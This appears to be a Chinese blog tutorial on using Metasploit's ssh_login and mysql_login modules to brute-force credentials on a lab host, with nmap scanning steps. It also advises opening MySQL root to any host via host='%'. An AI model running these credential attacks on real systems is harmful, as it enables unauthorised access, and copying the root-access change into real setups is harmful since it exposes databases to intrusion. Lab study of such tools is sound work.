msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法

本文主要是介绍msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

3.ssh_login攻击(ssh_login模块的使用)

3.1搜索ssh_login模块
  search ssh_login搜索模块

3.2进入并使用模块
 use 0(这里0表示前面的编号)

3.3查看需要设置的参数
 show options

yes表示必要设置的参数

no表示可以设置也可以不用设置的参数

3.4 设置RHOSTS参数
 set RHOSTS 192.168.251.139

3.5设置用户名密码的字典
  cd /optlsmkdir dictlscd /dictvim username.txtvim password.txt

3.6设置USER_fILE和 pass_fILE参数
  set uSER_fILE /opt/dict/username.txtset pass_fILE /opt/dict/password.txt这里不区分大小写

我这里仅仅只使用了username.txt,修改一下

3.7 run启动命令
 run

3.8 sessions查看启动成功后创建的session
 sessions

3.9 进入靶机
 sessions -i 1(1表示前面的id)

3.10进入靶机成功后尝试敲一些基础命令验证石佛偶进入靶机
 pwdwhoamiexit

表示进入靶机成功

4.mysql_login攻击(mysql_login模块的使用)

4.1 db_nmap -sP 192.168.251.0/24的用法
  db_nmap -sP 192.168.251.0/24将查询到的结果存入到数据库中

4.2 IP地址查询
 hosts地址查询

4.3 查询地址开放的端口号
  db_nmap -sS 192.168.251.139(IP地址)查询地址开放的端口号并将其写入到数据库中

4.4 将C段结果放入到数据库中
  db_nmap -Pn -sV 192.168.251.139

但是这里出现了报错,经过一系列排查后发现是数据库的原因,是由于数据库没有打开,按照上面开启数据库的办法将数据库打开就ok了

重新运行

出现这个表明运行成功

4.5 使用services查看IP地址所开放的端口
 services

4.6 查询mysql_login 模块
  search mysql_login

4.7 使用模块
 use 0

4.8 show options查询可以修改的参数
 show options

4.9设置密码
 set password 123456789

4.10 设置靶机IP地址
 set rhosts 192.168.251.1

4.11 run运行
 run

这里没有运行成功

排查问题后发现是数据库不能远程连接,为什么连接不上呢?

原因

(1) MySQL建用户的时候会指定一个host,默认是127.0.0.1/localhost只能本机访问;

(2) 其它机器用这个用户帐号访问会提示没有权限

4.12 解决办法
4.12.1 进入MySQL数据库
 mysql -u root -pEnter password:输入你的密码

4.12.2 进入mysql库
 use mysql

4.12.3 查看用户
 select host,user from user;
4.12.4 修改host

修改host原因: %为任意用户都有权限连接,localhost为只能本机连接,配置完host为%这一步就已经能外网访问了

  update user set host='%' where user='root';

4.12.5 修改成功后重新查看数据库信息
 select host,user from user;

修改成功

4.13 再次run运行
 run

4.14 查看数据库里面收集的信息
 creds

这里查询到了我们刚刚对数据库的操作

这篇关于msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/797534

相关文章

使用Java将DOCX文档解析为Markdown文档的代码实现

《使用Java将DOCX文档解析为Markdown文档的代码实现》在现代文档处理中,Markdown(MD)因其简洁的语法和良好的可读性,逐渐成为开发者、技术写作者和内容创作者的首选格式,然而,许多文... 目录引言1. 工具和库介绍2. 安装依赖库3. 使用Apache POI解析DOCX文档4. 将解析

Qt中QUndoView控件的具体使用

《Qt中QUndoView控件的具体使用》QUndoView是Qt框架中用于可视化显示QUndoStack内容的控件,本文主要介绍了Qt中QUndoView控件的具体使用,具有一定的参考价值,感兴趣的... 目录引言一、QUndoView 的用途二、工作原理三、 如何与 QUnDOStack 配合使用四、自

C++使用printf语句实现进制转换的示例代码

《C++使用printf语句实现进制转换的示例代码》在C语言中,printf函数可以直接实现部分进制转换功能,通过格式说明符(formatspecifier)快速输出不同进制的数值,下面给大家分享C+... 目录一、printf 原生支持的进制转换1. 十进制、八进制、十六进制转换2. 显示进制前缀3. 指

数据库面试必备之MySQL中的乐观锁与悲观锁

《数据库面试必备之MySQL中的乐观锁与悲观锁》:本文主要介绍数据库面试必备之MySQL中乐观锁与悲观锁的相关资料,乐观锁适用于读多写少的场景,通过版本号检查避免冲突,而悲观锁适用于写多读少且对数... 目录一、引言二、乐观锁(一)原理(二)应用场景(三)示例代码三、悲观锁(一)原理(二)应用场景(三)示例

Python运行中频繁出现Restart提示的解决办法

《Python运行中频繁出现Restart提示的解决办法》在编程的世界里,遇到各种奇怪的问题是家常便饭,但是,当你的Python程序在运行过程中频繁出现“Restart”提示时,这可能不仅仅是令人头疼... 目录问题描述代码示例无限循环递归调用内存泄漏解决方案1. 检查代码逻辑无限循环递归调用内存泄漏2.

使用Python构建一个Hexo博客发布工具

《使用Python构建一个Hexo博客发布工具》虽然Hexo的命令行工具非常强大,但对于日常的博客撰写和发布过程,我总觉得缺少一个直观的图形界面来简化操作,下面我们就来看看如何使用Python构建一个... 目录引言Hexo博客系统简介设计需求技术选择代码实现主框架界面设计核心功能实现1. 发布文章2. 加

python logging模块详解及其日志定时清理方式

《pythonlogging模块详解及其日志定时清理方式》:本文主要介绍pythonlogging模块详解及其日志定时清理方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地... 目录python logging模块及日志定时清理1.创建logger对象2.logging.basicCo

Node.js 数据库 CRUD 项目示例详解(完美解决方案)

《Node.js数据库CRUD项目示例详解(完美解决方案)》:本文主要介绍Node.js数据库CRUD项目示例详解(完美解决方案),本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考... 目录项目结构1. 初始化项目2. 配置数据库连接 (config/db.js)3. 创建模型 (models/

SQL表间关联查询实例详解

《SQL表间关联查询实例详解》本文主要讲解SQL语句中常用的表间关联查询方式,包括:左连接(leftjoin)、右连接(rightjoin)、全连接(fulljoin)、内连接(innerjoin)、... 目录简介样例准备左外连接右外连接全外连接内连接交叉连接自然连接简介本文主要讲解SQL语句中常用的表

SQL server配置管理器找不到如何打开它

《SQLserver配置管理器找不到如何打开它》最近遇到了SQLserver配置管理器打不开的问题,尝试在开始菜单栏搜SQLServerManager无果,于是将自己找到的方法总结分享给大家,对SQ... 目录方法一:桌面图标进入方法二:运行窗口进入方法三:查找文件路径方法四:检查 SQL Server 安